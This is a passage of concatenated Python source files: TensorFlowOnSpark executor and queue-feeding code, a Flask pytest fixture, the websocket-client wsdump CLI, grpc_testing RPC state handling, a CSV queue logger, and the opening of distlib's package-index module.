    cluster_id = None         #: Unique ID for a given TensorFlowOnSpark cluster, used for invalidating state for new clusters.
def _get_manager(cluster_info, host, executor_id):
    """Return this executor's "singleton" TFManager, reconnecting per python-worker if needed.

    Args:
      :cluster_info: cluster node reservations
      :host: host IP address
      :executor_id: unique id per executor (created during initial call to run())

    Returns:
      TFManager instance for this executor/python-worker

    Raises:
      Exception: when no reservation matches this (host, executor_id) pair.
    """
    # Find the reservation made by this executor and reconnect to its manager.
    match = next(
        (node for node in cluster_info
         if node['host'] == host and node['executor_id'] == executor_id),
        None,
    )
    if match is not None:
        TFSparkNode.mgr = TFManager.connect(match['addr'], match['authkey'])
    if TFSparkNode.mgr is None:
        msg = "No TFManager found on this node, please ensure that:\n" + \
              "1. Spark num_executors matches TensorFlow cluster_size\n" + \
              "2. Spark cores/tasks per executor is 1.\n" + \
              "3. Spark dynamic allocation is disabled."
        raise Exception(msg)
    logging.info("Connected to TFSparkNode.mgr on {0}, executor={1}, state={2}".format(host, executor_id, str(TFSparkNode.mgr.get('state'))))
    return TFSparkNode.mgr
def run(fn, tf_args, cluster_meta, tensorboard, log_dir, queues, background):
    """Wraps the user-provided TensorFlow main function in a Spark mapPartitions function.

    Args:
      :fn: TensorFlow "main" function provided by the user.
      :tf_args: ``argparse`` args, or command line ``ARGV``. These will be passed to the ``fn``.
      :cluster_meta: dictionary of cluster metadata (e.g. cluster_id, reservation.Server address, etc).
      :tensorboard: boolean indicating if the chief worker should spawn a Tensorboard server.
      :log_dir: directory to save tensorboard event logs. If None, defaults to a fixed path on local filesystem.
      :queues: *INTERNAL_USE*
      :background: boolean indicating if the TensorFlow "main" function should be run in a background process.

    Returns:
      A nodeRDD.mapPartitions() function.
    """
    def _mapfn(iter):
        # Runs once per Spark executor; the partition yields this executor's id.
        import tensorflow as tf
        # Note: consuming the input iterator helps Pyspark re-use this worker,
        for i in iter:
            executor_id = i
        # run quick check of GPU infrastructure if using tensorflow-gpu
        if tf.test.is_built_with_cuda():
            gpus_to_use = gpu_info.get_gpus(num_gpu=1)
        # assign TF job/task based on provided cluster_spec template (or use default/null values)
        job_name = 'default'
        task_index = -1
        cluster_id = cluster_meta['id']
        cluster_template = cluster_meta['cluster_template']
        for jobtype in cluster_template:
            nodes = cluster_template[jobtype]
            if executor_id in nodes:
                job_name = jobtype
                task_index = nodes.index(executor_id)
                break
        # get unique key (hostname, executor_id) for this executor
        host = util.get_ip_address()
        util.write_executor_id(executor_id)
        port = 0
        # check for existing TFManagers
        # NOTE: manager state values compare against their repr()-quoted form,
        # hence "'stopped'" with embedded quotes.
        if TFSparkNode.mgr is not None and str(TFSparkNode.mgr.get('state')) != "'stopped'":
            if TFSparkNode.cluster_id == cluster_id:
                # raise an exception to force Spark to retry this "reservation" task on another executor
                raise Exception("TFManager already started on {0}, executor={1}, state={2}".format(host, executor_id, str(TFSparkNode.mgr.get("state"))))
            else:
                # old state, just continue with creating new manager
                logging.warn("Ignoring old TFManager with cluster_id {0}, requested cluster_id {1}".format(TFSparkNode.cluster_id, cluster_id))
        # start a TFManager and get a free port
        # use a random uuid as the authkey
        authkey = uuid.uuid4().bytes
        addr = None
        if job_name == 'ps':
            # PS nodes must be remotely accessible in order to shutdown from Spark driver.
            TFSparkNode.mgr = TFManager.start(authkey, ['control', 'error'], 'remote')
            addr = (host, TFSparkNode.mgr.address[1])
        else:
            # worker nodes only need to be locally accessible within the executor for data feeding
            TFSparkNode.mgr = TFManager.start(authkey, queues)
            addr = TFSparkNode.mgr.address
        # initialize mgr state
        TFSparkNode.mgr.set('state', 'running')
        TFSparkNode.cluster_id = cluster_id
        # expand Hadoop classpath wildcards for JNI (Spark 2.x)
        if 'HADOOP_PREFIX' in os.environ:
            classpath = os.environ['CLASSPATH']
            hadoop_path = os.path.join(os.environ['HADOOP_PREFIX'], 'bin', 'hadoop')
            hadoop_classpath = subprocess.check_output([hadoop_path, 'classpath', '--glob']).decode()
            logging.debug("CLASSPATH: {0}".format(hadoop_classpath))
            os.environ['CLASSPATH'] = classpath + os.pathsep + hadoop_classpath
        # start TensorBoard if requested
        tb_pid = 0
        tb_port = 0
        if tensorboard and job_name == 'worker' and task_index == 0:
            # bind-then-close to reserve a free ephemeral port for TensorBoard
            tb_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            tb_sock.bind(('', 0))
            tb_port = tb_sock.getsockname()[1]
            tb_sock.close()
            logdir = log_dir if log_dir else "tensorboard_%d" % executor_id
            # search for tensorboard in python/bin, PATH, and PYTHONPATH
            pypath = sys.executable
            pydir = os.path.dirname(pypath)
            search_path = os.pathsep.join([pydir, os.environ['PATH'], os.environ['PYTHONPATH']])
            tb_path = util.find_in_path(search_path, 'tensorboard')  # executable in PATH
            if not tb_path:
                tb_path = util.find_in_path(search_path, 'tensorboard/main.py')  # TF 1.3+
            if not tb_path:
                tb_path = util.find_in_path(search_path, 'tensorflow/tensorboard/__main__.py')  # TF 1.2-
            if not tb_path:
                raise Exception("Unable to find 'tensorboard' in: {}".format(search_path))
            # launch tensorboard
            tb_proc = subprocess.Popen([pypath, tb_path, "--logdir=%s" % logdir, "--port=%d" % tb_port], env=os.environ)
            tb_pid = tb_proc.pid
        # check server to see if this task is being retried (i.e. already reserved)
        client = reservation.Client(cluster_meta['server_addr'])
        cluster_info = client.get_reservations()
        tmp_sock = None
        node_meta = None
        for node in cluster_info:
            (nhost, nexec) = (node['host'], node['executor_id'])
            if nhost == host and nexec == executor_id:
                node_meta = node
                port = node['port']
        # if not already done, register everything we need to set up the cluster
        if node_meta is None:
            # first, find a free port for TF
            tmp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            tmp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            tmp_sock.bind(('', port))
            port = tmp_sock.getsockname()[1]
            node_meta = {
                'executor_id': executor_id,
                'host': host,
                'job_name': job_name,
                'task_index': task_index,
                'port': port,
                'tb_pid': tb_pid,
                'tb_port': tb_port,
                'addr': addr,
                'authkey': authkey
            }
            # register node metadata with server
            logging.info("TFSparkNode.reserve: {0}".format(node_meta))
            client.register(node_meta)
        # wait for other nodes to finish reservations
        cluster_info = client.await_reservations()
        client.close()
        # construct a TensorFlow clusterspec from cluster_info
        sorted_cluster_info = sorted(cluster_info, key=lambda k: k['executor_id'])
        spec = {}
        last_executor_id = -1
        for node in sorted_cluster_info:
            if (node['executor_id'] == last_executor_id):
                raise Exception("Duplicate worker/task in cluster_info")
            last_executor_id = node['executor_id']
            logging.info("node: {0}".format(node))
            (njob, nhost, nport) = (node['job_name'], node['host'], node['port'])
            hosts = [] if njob not in spec else spec[njob]
            hosts.append("{0}:{1}".format(nhost, nport))
            spec[njob] = hosts
        # update TF_CONFIG and reserve GPU for tf.estimator based code
        # Note: this will execute but be ignored by non-tf.estimator code
        tf_config = json.dumps({
            'cluster': spec,
            'task': {'type': job_name, 'index': task_index},
            'environment': 'cloud'
        })
        os.environ['TF_CONFIG'] = tf_config
        if tf.test.is_built_with_cuda():
            num_gpus = tf_args.num_gpus if 'num_gpus' in tf_args else 1
            gpus_to_use = gpu_info.get_gpus(num_gpu=num_gpus, executor_id=executor_id)
            gpu_str = "GPUs" if num_gpus > 1 else "GPU"
            logging.debug("Requested {} {}, setting CUDA_VISIBLE_DEVICES={}".format(num_gpus, gpu_str, gpus_to_use))
            os.environ['CUDA_VISIBLE_DEVICES'] = gpus_to_use
        # create a context object to hold metadata for TF
        ctx = TFNodeContext(executor_id, job_name, task_index, spec, cluster_meta['default_fs'], cluster_meta['working_dir'], TFSparkNode.mgr)
        # release port reserved for TF as late as possible
        if tmp_sock is not None:
            tmp_sock.close()
        # Background mode relies reuse of python worker in Spark.
        if background:
            # However, reuse of python worker can't work on Windows, we need to check if the current
            # script runs on Windows or not.
            if os.name == 'nt' or platform.system() == 'Windows':
                raise Exception("Background mode is not supported on Windows.")
            # Check if the config of reuse python worker is enabled on Spark.
            if not os.environ.get("SPARK_REUSE_WORKER"):
                raise Exception("Background mode relies reuse of python worker on Spark. This config 'spark.python.worker.reuse' is not enabled on Spark. Please enable it before using background.")

        def wrapper_fn(args, context):
            """Wrapper function that sets the sys.argv of the executor."""
            if isinstance(args, list):
                sys.argv = args
            fn(args, context)

        def wrapper_fn_background(args, context):
            """Wrapper function that signals exceptions to foreground process."""
            errq = TFSparkNode.mgr.get_queue('error')
            try:
                wrapper_fn(args, context)
            except Exception:
                errq.put(traceback.format_exc())
                errq.join()

        if job_name == 'ps' or background:
            # invoke the TensorFlow main function in a background thread
            logging.info("Starting TensorFlow {0}:{1} as {2} on cluster node {3} on background process".format(
                job_name, task_index, job_name, executor_id))
            p = multiprocessing.Process(target=wrapper_fn_background, args=(tf_args, ctx))
            if job_name == 'ps':
                p.daemon = True
            p.start()
            # for ps nodes only, wait indefinitely in foreground thread for a "control" event (None == "stop")
            if job_name == 'ps':
                queue = TFSparkNode.mgr.get_queue('control')
                equeue = TFSparkNode.mgr.get_queue('error')
                done = False
                while not done:
                    while (queue.empty() and equeue.empty()):
                        time.sleep(1)
                    if (not equeue.empty()):
                        # propagate the child process' exception to Spark
                        e_str = equeue.get()
                        equeue.task_done()
                        raise Exception("exception in ps:\n" + e_str)
                    msg = queue.get(block=True)
                    logging.info("Got msg: {0}".format(msg))
                    if msg is None:
                        logging.info("Terminating PS")
                        TFSparkNode.mgr.set('state', 'stopped')
                        done = True
                    queue.task_done()
        else:
            # otherwise, just run TF function in the main executor/worker thread
            logging.info("Starting TensorFlow {0}:{1} on cluster node {2} on foreground thread".format(job_name, task_index, executor_id))
            wrapper_fn(tf_args, ctx)
            logging.info("Finished TensorFlow {0}:{1} on cluster node {2}".format(job_name, task_index, executor_id))
    return _mapfn
def train(cluster_info, cluster_meta, qname='input'):
    """Feeds Spark partitions into the shared multiprocessing.Queue.

    Args:
      :cluster_info: node reservation information for the cluster (e.g. host, executor_id, pid, ports, etc)
      :cluster_meta: dictionary of cluster metadata (e.g. cluster_id, reservation.Server address, etc)
      :qname: *INTERNAL_USE*

    Returns:
      A dataRDD.mapPartitions() function
    """
    def _train(iter):
        # get shared queue, reconnecting if necessary
        mgr = _get_manager(cluster_info, util.get_ip_address(), util.read_executor_id())
        try:
            queue = mgr.get_queue(qname)
            equeue = mgr.get_queue('error')
        except (AttributeError, KeyError):
            msg = "Queue '{}' not found on this node, check for exceptions on other nodes.".format(qname)
            raise Exception(msg)
        # manager state values come back repr()-quoted, hence "'terminating'"
        state = str(mgr.get('state'))
        logging.info("mgr.state={0}".format(state))
        terminating = state == "'terminating'"
        if terminating:
            # TF has signalled end-of-training: drain (and drop) this partition
            logging.info("mgr is terminating, skipping partition")
            count = 0
            for item in iter:
                count += 1
            logging.info("Skipped {0} items from partition".format(count))
        else:
            logging.info("Feeding partition {0} into {1} queue {2}".format(iter, qname, queue))
            count = 0
            for item in iter:
                count += 1
                queue.put(item, block=True)
            # wait for consumers to finish processing all items in queue before "finishing" this iterator
            joinThr = Thread(target=queue.join)
            joinThr.start()
            # Fix: Thread.isAlive() was removed in Python 3.9; is_alive() is
            # the equivalent API available since Python 2.6.
            while (joinThr.is_alive()):
                if (not equeue.empty()):
                    e_str = equeue.get()
                    equeue.task_done()
                    raise Exception("exception in worker:\n" + e_str)
                time.sleep(1)
            logging.info("Processed {0} items in partition".format(count))
        # check if TF is terminating feed after this partition
        state = str(mgr.get('state'))
        terminating = state == "'terminating'"
        if terminating:
            try:
                logging.info("TFSparkNode: requesting stop")
                client = reservation.Client(cluster_meta['server_addr'])
                client.request_stop()
                client.close()
            except Exception as e:
                # ignore any errors while requesting stop
                logging.debug("Error while requesting stop: {0}".format(e))
        return [terminating]
    return _train
def inference(cluster_info, qname='input'):
    """Feeds Spark partitions into the shared multiprocessing.Queue and returns inference results.

    Args:
      :cluster_info: node reservation information for the cluster (e.g. host, executor_id, pid, ports, etc)
      :qname: *INTERNAL_USE*

    Returns:
      A dataRDD.mapPartitions() function
    """
    def _inference(iter):
        # get shared queue, reconnecting if necessary
        mgr = _get_manager(cluster_info, util.get_ip_address(), util.read_executor_id())
        try:
            queue_in = mgr.get_queue(qname)
            equeue = mgr.get_queue('error')
        except (AttributeError, KeyError):
            msg = "Queue '{}' not found on this node, check for exceptions on other nodes.".format(qname)
            raise Exception(msg)
        logging.info("Feeding partition {0} into {1} queue {2}".format(iter, qname, queue_in))
        count = 0
        for item in iter:
            count += 1
            queue_in.put(item, block=True)
        # signal "end of partition"
        queue_in.put(marker.EndPartition())
        # skip empty partitions
        if count == 0:
            return []
        # wait for consumers to finish processing all items in queue before "finishing" this iterator
        joinThr = Thread(target=queue_in.join)
        joinThr.start()
        # Fix: Thread.isAlive() was removed in Python 3.9; is_alive() is the
        # equivalent API available since Python 2.6.
        while (joinThr.is_alive()):
            if (not equeue.empty()):
                e_str = equeue.get()
                equeue.task_done()
                raise Exception("exception in worker:\n" + e_str)
            time.sleep(1)
        logging.info("Processed {0} items in partition".format(count))
        # read result queue: expect exactly one output item per input item
        results = []
        queue_out = mgr.get_queue('output')
        while count > 0:
            result = queue_out.get(block=True)
            results.append(result)
            count -= 1
            queue_out.task_done()
        logging.info("Finished processing partition")
        return results
    return _inference
def shutdown(cluster_info, queues=('input',)):
    """Stops all TensorFlow nodes by feeding ``None`` into the multiprocessing.Queues.

    Args:
      :cluster_info: node reservation information for the cluster (e.g. host, executor_id, pid, ports, etc).
      :queues: *INTERNAL_USE*

    Returns:
      A nodeRDD.mapPartitions() function
    """
    # Note: the default was the mutable list ['input']; an immutable tuple is
    # equivalent here (only iterated) and avoids the shared-default pitfall.
    def _shutdown(iter):
        host = util.get_ip_address()
        executor_id = util.read_executor_id()
        # reconnect to shared queue
        mgr = _get_manager(cluster_info, host, executor_id)
        # send SIGTERM to Tensorboard proc (if running)
        for node in cluster_info:
            if node['host'] == host and node['executor_id'] == executor_id:
                tb_pid = node['tb_pid']
                if tb_pid != 0:
                    logging.info("Stopping tensorboard (pid={0})".format(tb_pid))
                    subprocess.Popen(["kill", str(tb_pid)])
        # terminate any listening queues
        logging.info("Stopping all queues")
        for q in queues:
            try:
                queue = mgr.get_queue(q)
                logging.info("Feeding None into {0} queue".format(q))
                queue.put(None, block=True)
            except (AttributeError, KeyError):
                msg = "Queue '{}' not found on this node, check for exceptions on other nodes.".format(q)
                raise Exception(msg)
        logging.info("Setting mgr.state to 'stopped'")
        mgr.set('state', 'stopped')
        return [True]
    return _shutdown
|
conftest.py | import pytest
import socket
import time
from urllib.request import urlopen
from flask import Flask
from multiprocessing import Process
from os import path
from flask_rangerequest import RangeRequest
class Server:
    """Minimal Flask app that serves the dummy file with HTTP range support."""

    def __init__(self) -> None:
        self.app = Flask(__name__)
        self.dummy_file = DummyFile()

        @self.app.route('/', methods=('GET', 'POST'))
        def index():
            # Byte-range handling is delegated to flask_rangerequest.
            return RangeRequest(self.dummy_file.contents).make_response()
class DummyFile:
    """In-memory copy of the project README, used as the served payload."""

    def __init__(self) -> None:
        readme = path.join(path.dirname(__file__), '..', 'README.md')
        self.full_path = readme
        with open(readme, 'rb') as fh:
            self.contents = fh.read()
        self.size = len(self.contents)
@pytest.fixture(scope='function')
def server():
    # Fresh, unbound Server per test; nothing listens on a port here.
    return Server()
@pytest.fixture(scope='session')
def live_server():
    """Run a Server in a child process and yield its ``host:port`` address."""
    # Pick a free ephemeral port by binding and immediately closing a socket.
    probe = socket.socket()
    probe.bind(("localhost", 0))
    port = probe.getsockname()[1]
    probe.close()

    srv = Server()

    def run():
        srv.app.run(host='127.0.0.1', port=port, debug=False)

    proc = Process(target=run)
    proc.start()
    address = '127.0.0.1:{}'.format(port)
    # Poll until the server answers (up to ~10 seconds).
    for _ in range(20):
        try:
            urlopen('http://{}'.format(address))
            break
        except Exception:
            time.sleep(0.5)
    else:
        raise Exception('Cannot connect to server.')
    yield address
    proc.terminate()
|
wsdump.py | #!/home/ledger/ledger-ibithub/ledger/bin/python
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
    """Return stdin's encoding, lower-cased, defaulting to "utf-8"."""
    enc = getattr(sys.stdin, "encoding", "")
    return enc.lower() if enc else "utf-8"
# Frame opcodes that carry application payload (text/binary frames).
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
# Console encoding used to normalise interactive input.
ENCODING = get_encoding()
class VAction(argparse.Action):
    """Verbosity action: accepts an explicit integer or counts 'v' letters.

    ``-v`` -> 1, ``-vvv`` -> 3 (one per extra 'v' plus one), ``-v 2`` -> 2.
    """

    def __call__(self, parser, args, values, option_string=None):
        if values is None:
            values = "1"
        try:
            level = int(values)
        except ValueError:
            # e.g. "-vvv" passes "vv" as the value: count the v's plus one.
            level = values.count("v") + 1
        setattr(args, self.dest, level)
def parse_args():
    """Build and evaluate the command-line interface for the dump tool."""
    ap = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
    ap.add_argument("url", metavar="ws_url",
                    help="websocket url. ex. ws://echo.websocket.org/")
    ap.add_argument("-p", "--proxy",
                    help="proxy url. ex. http://127.0.0.1:8080")
    ap.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
                    dest="verbose",
                    help="set verbose mode. If set to 1, show opcode. "
                         "If set to 2, enable to trace websocket module")
    ap.add_argument("-n", "--nocert", action='store_true',
                    help="Ignore invalid SSL cert")
    ap.add_argument("-r", "--raw", action="store_true",
                    help="raw output")
    ap.add_argument("-s", "--subprotocols", nargs='*',
                    help="Set subprotocols")
    ap.add_argument("-o", "--origin",
                    help="Set origin")
    ap.add_argument("--eof-wait", default=0, type=int,
                    help="wait time(second) after 'EOF' received.")
    ap.add_argument("-t", "--text",
                    help="Send initial text")
    ap.add_argument("--timings", action="store_true",
                    help="Print timings in seconds")
    ap.add_argument("--headers",
                    help="Set custom headers. Use ',' as separator")
    return ap.parse_args()
class RawInput:
    """Prompt helper that normalises console input to UTF-8 bytes on Python 2/3."""

    def raw_input(self, prompt):
        # input() on Python 3; the builtin raw_input() on Python 2.
        if six.PY3:
            line = input(prompt)
        else:
            line = raw_input(prompt)
        # Python 2 byte-string from a non-UTF-8 console: transcode to UTF-8.
        if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
            line = line.decode(ENCODING).encode("utf-8")
        elif isinstance(line, six.text_type):
            # Unicode text: encode so callers always receive UTF-8 bytes.
            line = line.encode("utf-8")
        return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
    """REPL-style console: prints received frames in colour above the prompt."""

    def write(self, data):
        # Erase the current line and reposition the cursor (ANSI escapes).
        sys.stdout.write("\033[2K\033[E")
        # sys.stdout.write("\n")
        # Received payload in blue, then restore the default foreground colour.
        sys.stdout.write("\033[34m< " + data + "\033[39m")
        sys.stdout.write("\n> ")
        sys.stdout.flush()

    def read(self):
        return self.raw_input("> ")
class NonInteractive(RawInput):
    """Plain line-oriented console for piped/raw usage (no prompt, no colour)."""

    def write(self, data):
        sys.stdout.write("%s\n" % data)
        sys.stdout.flush()

    def read(self):
        return self.raw_input("")
def main():
    """Connect to a WebSocket URL and pump frames between console and socket."""
    start_time = time.time()
    args = parse_args()
    if args.verbose > 1:
        websocket.enableTrace(True)
    options = {}
    if args.proxy:
        p = urlparse(args.proxy)
        options["http_proxy_host"] = p.hostname
        options["http_proxy_port"] = p.port
    if args.origin:
        options["origin"] = args.origin
    if args.subprotocols:
        options["subprotocols"] = args.subprotocols
    opts = {}
    if args.nocert:
        # Disable certificate and hostname verification on request.
        opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
    if args.headers:
        options['header'] = list(map(str.strip, args.headers.split(',')))
    ws = websocket.create_connection(args.url, sslopt=opts, **options)
    if args.raw:
        console = NonInteractive()
    else:
        console = InteractiveConsole()
        print("Press Ctrl+C to quit")

    def recv():
        # Receive a single frame, answering control frames (close/ping) inline.
        try:
            frame = ws.recv_frame()
        except websocket.WebSocketException:
            return websocket.ABNF.OPCODE_CLOSE, None
        if not frame:
            raise websocket.WebSocketException("Not a valid frame %s" % frame)
        elif frame.opcode in OPCODE_DATA:
            return frame.opcode, frame.data
        elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
            ws.send_close()
            return frame.opcode, None
        elif frame.opcode == websocket.ABNF.OPCODE_PING:
            ws.pong(frame.data)
            return frame.opcode, frame.data
        return frame.opcode, frame.data

    def recv_ws():
        # Receive loop run on a daemon thread; prints frames until close.
        while True:
            opcode, data = recv()
            msg = None
            if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
                data = str(data, "utf-8")
            # Best-effort decompression of binary payloads (gzip magic bytes,
            # otherwise raw deflate); failures fall through to repr() below.
            if isinstance(data, bytes) and len(data) > 2 and data[:2] == b'\037\213':  # gzip magick
                try:
                    data = "[gzip] " + str(gzip.decompress(data), "utf-8")
                except:
                    pass
            elif isinstance(data, bytes):
                try:
                    data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
                except:
                    pass
            if isinstance(data, bytes):
                data = repr(data)
            if args.verbose:
                msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
            else:
                msg = data
            if msg is not None:
                if args.timings:
                    console.write(str(time.time() - start_time) + ": " + msg)
                else:
                    console.write(msg)
            if opcode == websocket.ABNF.OPCODE_CLOSE:
                break

    thread = threading.Thread(target=recv_ws)
    thread.daemon = True
    thread.start()
    if args.text:
        ws.send(args.text)
    # Foreground loop: read from console and send until interrupted or EOF.
    while True:
        try:
            message = console.read()
            ws.send(message)
        except KeyboardInterrupt:
            return
        except EOFError:
            time.sleep(args.eof_wait)
            return
if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        # Print only the message; the traceback is intentionally suppressed
        # to keep the CLI output clean.
        print(e)
|
_rpc.py | # Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import grpc
from grpc_testing import _common
class Rpc(object):
    """Server-side state of a single in-progress RPC for grpc_testing.

    Thread-safety: every public method acquires ``self._condition``; the
    ``_``-prefixed helpers assume the caller already holds it.
    """

    def __init__(self, handler, invocation_metadata):
        self._condition = threading.Condition()
        self._handler = handler
        self._invocation_metadata = invocation_metadata
        # True once initial metadata has been sent (it may be sent only once).
        self._initial_metadata_sent = False
        # Pending values staged by set_* until the RPC completes.
        self._pending_trailing_metadata = None
        self._pending_code = None
        self._pending_details = None
        # List of termination callbacks; becomes None once the RPC ends.
        self._callbacks = []
        self._active = True
        self._rpc_errors = []

    def _ensure_initial_metadata_sent(self):
        # Send empty initial metadata if none was sent explicitly.
        if not self._initial_metadata_sent:
            self._handler.send_initial_metadata(_common.FUSSED_EMPTY_METADATA)
            self._initial_metadata_sent = True

    def _call_back(self):
        # Snapshot and clear callbacks; None marks the RPC as terminated for
        # add_callback().
        callbacks = tuple(self._callbacks)
        self._callbacks = None

        def call_back():
            for callback in callbacks:
                try:
                    callback()
                except Exception:  # pylint: disable=broad-except
                    logging.exception('Exception calling server-side callback!')

        # Invoke callbacks on their own thread so they run outside the
        # condition lock held by the caller.
        callback_calling_thread = threading.Thread(target=call_back)
        callback_calling_thread.start()

    def _terminate(self, trailing_metadata, code, details):
        # Idempotent: only the first termination takes effect.
        if self._active:
            self._active = False
            self._handler.send_termination(trailing_metadata, code, details)
            self._call_back()
            self._condition.notify_all()

    def _complete(self):
        # Successful completion using staged metadata/code/details, with
        # defaults of empty metadata, StatusCode.OK and empty details.
        if self._pending_trailing_metadata is None:
            trailing_metadata = _common.FUSSED_EMPTY_METADATA
        else:
            trailing_metadata = self._pending_trailing_metadata
        if self._pending_code is None:
            code = grpc.StatusCode.OK
        else:
            code = self._pending_code
        details = '' if self._pending_details is None else self._pending_details
        self._terminate(trailing_metadata, code, details)

    def _abort(self, code, details):
        self._terminate(_common.FUSSED_EMPTY_METADATA, code, details)

    def add_rpc_error(self, rpc_error):
        with self._condition:
            self._rpc_errors.append(rpc_error)

    def application_cancel(self):
        with self._condition:
            self._abort(grpc.StatusCode.CANCELLED,
                        'Cancelled by server-side application!')

    def application_exception_abort(self, exception):
        with self._condition:
            # Only log exceptions not already recorded as deliberate RPC errors.
            if exception not in self._rpc_errors:
                logging.exception('Exception calling application!')
            self._abort(
                grpc.StatusCode.UNKNOWN,
                'Exception calling application: {}'.format(exception))

    def extrinsic_abort(self):
        # Abort initiated from outside the application (no termination sent).
        with self._condition:
            if self._active:
                self._active = False
                self._call_back()
                self._condition.notify_all()

    def unary_response_complete(self, response):
        with self._condition:
            self._ensure_initial_metadata_sent()
            self._handler.add_response(response)
            self._complete()

    def stream_response(self, response):
        with self._condition:
            self._ensure_initial_metadata_sent()
            self._handler.add_response(response)

    def stream_response_complete(self):
        with self._condition:
            self._ensure_initial_metadata_sent()
            self._complete()

    def send_initial_metadata(self, initial_metadata):
        # Returns False if initial metadata was already sent.
        with self._condition:
            if self._initial_metadata_sent:
                return False
            else:
                self._handler.send_initial_metadata(initial_metadata)
                self._initial_metadata_sent = True
                return True

    def is_active(self):
        with self._condition:
            return self._active

    def add_callback(self, callback):
        # Returns False if the RPC has already terminated.
        with self._condition:
            if self._callbacks is None:
                return False
            else:
                self._callbacks.append(callback)
                return True

    def invocation_metadata(self):
        with self._condition:
            return self._invocation_metadata

    def set_trailing_metadata(self, trailing_metadata):
        with self._condition:
            self._pending_trailing_metadata = trailing_metadata

    def set_code(self, code):
        with self._condition:
            self._pending_code = code

    def set_details(self, details):
        with self._condition:
            self._pending_details = details
|
queue_logger.py | import multiprocessing as mp
import csv
class QueueLogger(object):
    """
    Records data from a multiprocessing.Queue to an output file

    Attributes
    ----------
    filename : string
        Name of the output file to write to
    buffersize : unsigned int
        Number of results to collect from the queue before writing them to file
    buffer : list
        Used to cache results as read from the queue so that the output file need
        not be reopened for writing after each Queue.get() call
    count : unsigned int
        Number of rows written to the output file so far (header excluded).
    """

    def __init__(self, filename, quantities, buffersize, total):
        """
        Create a QueueLogger object that will read from a multiprocessing.Queue,
        store results in a buffer, and write the buffer to an output file when
        it is full. A watcher process must be created in order to use this object.

        Parameters
        ----------
        filename : string
            Name of the output file to write to
        quantities : list of strings
            Names of quantities to be evaluated and recorded (CSV header row)
        buffersize : unsigned int
            Number of results to collect from the queue before writing them to file
        total : unsigned int
            Number of items expected in the queue. Used for reporting progress.

        Example
        -------
        >>> import multiprocessing as mp
        >>> ql = QueueLogger('output.txt', ['x', 'y'], 50, 1000)
        >>> qresults = mp.Queue()
        >>> watcher = mp.Process(target=ql.read, args=(qresults,))
        >>> watcher.start()
        # Run some processes that write to qresults
        >>> watcher.terminate()
        """
        self.filename = filename
        self.buffersize = buffersize
        self.buffer = list()
        self.count = 0
        self.progress = 0
        self.total = total
        # Write the CSV header immediately so the file exists before the
        # watcher process starts appending rows.
        with open(self.filename, 'w') as csvfile:
            csv.writer(csvfile).writerow(quantities)

    def read(self, q):
        """
        Read results from a queue and append them to the buffer. Write the buffer
        to a file when it is full.

        Parameters
        ----------
        q : multiprocessing.Queue

        NOTE(review): this loop busy-waits while the queue is empty, and rows
        still buffered when producers finish are only flushed once the buffer
        fills again; callers are expected to terminate() the watcher process.
        """
        print("\n\nCompute Progress:")
        print("0.00%")
        while True:
            while not q.empty():
                result = q.get()
                self.buffer.append(result)
                if len(self.buffer) >= self.buffersize:
                    self.progress += len(self.buffer)
                    self.write_buffer()
                    # Guard against ZeroDivisionError when total == 0.
                    if self.total:
                        print("{:.2%}".format(self.progress / self.total))

    def write_buffer(self):
        """Append buffered rows to the output file in arrival (FIFO) order."""
        with open(self.filename, 'a') as csvfile:
            writer = csv.writer(csvfile)
            # Bug fix: the previous implementation popped rows from the END of
            # the buffer, so each flushed batch was written in reverse order
            # of receipt. Iterate front-to-back instead.
            for row in self.buffer:
                if row is not None:
                    writer.writerow(row)
                    self.count += 1
            self.buffer = []
|
index.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (
HTTPBasicAuthHandler,
Request,
HTTPPasswordMgr,
urlparse,
build_opener,
string_types,
)
from .util import zip_dir, ServerProxy
logger = logging.getLogger(__name__)

# Defaults used when no .pypirc configuration overrides them.
DEFAULT_INDEX = "https://pypi.org/pypi"
DEFAULT_REALM = "pypi"
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b"----------ThIs_Is_tHe_distlib_index_bouNdaRY_$"
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ("http", "https"):
raise DistlibException("invalid repository: %s" % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
with open(os.devnull, "w") as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ("gpg", "gpg2"):
try:
rc = subprocess.check_call(
[s, "--version"], stdout=sink, stderr=sink
)
if rc == 0:
self.gpg = s
break
